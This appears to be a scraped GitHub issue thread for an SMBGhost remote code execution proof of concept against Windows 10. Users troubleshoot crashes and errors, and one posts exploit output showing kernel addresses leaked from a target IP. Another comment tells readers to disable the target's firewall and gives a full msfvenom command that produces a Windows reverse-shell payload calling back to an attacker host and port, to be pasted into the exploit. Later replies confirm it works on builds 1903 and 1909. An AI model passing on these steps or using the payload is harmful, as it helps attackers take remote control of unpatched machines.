Comments (8)
I have this problem,so what should I do
from smbghost_rce_poc.
I have this problem,so what should I do
Unfortunately i couldn't find a solution yet :/
from smbghost_rce_poc.
nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly
from smbghost_rce_poc.
fix for this error has been pushed
from smbghost_rce_poc.
Thank you i have another error now:
python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
File "exploit.py", line 465, in <module>
do_rce(args.ip, args.port)
File "exploit.py", line 428, in do_rce
search_hal_heap(ip, port)
File "exploit.py", line 356, in search_hal_heap
PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes
from smbghost_rce_poc.
OK ppl, if you are reading this dont forget to
- close won 10 b1903/1909 firewall
- run msfvenom as:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
and change the USER_PAYLOAD with this shellcode.
This code now works on b1903.
And i cannot make it exploit on 1909 machines.
from smbghost_rce_poc.
Ok, when i use the exploit on b1909 machines, python code works normally (i mean no error output). But the b1909 machine crashes and reboots.
from smbghost_rce_poc.
now works on 1909 thanks
from smbghost_rce_poc.
Related Issues (20)
- Different payload HOT 2
- bluescreen was trigged HOT 9
- Please HOT 7
- Debug mode on/off difference in entry variable HOT 8
- Trying to detect (check) not to exploit the vulnerability HOT 1
- About "Failed to find low stub in physical memory!" problem?
- how to setup? guide me. HOT 1
- BSOD
- please answer my question HOT 1
- done
- windows 10 build 1909 Crash!! HOT 6
- ParseError invalid opcode near "OFFSET_NTBASE" at "\"<unk>\"" line 8
- Failed to find HalpInterruptController HOT 3
- Crash on 1903 (OS Build 18362.30 Education) HOT 3
- An error occurred during program operation HOT 1
- Unable to unpack HalpApicRequestInterrupt HOT 2
- physical read primitive failed HOT 24
- which port should I listen on my computer? HOT 5
- Strange socket timeout issues HOT 1
- Win 1909 Enterprise socket timeout HOT 14
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from smbghost_rce_poc.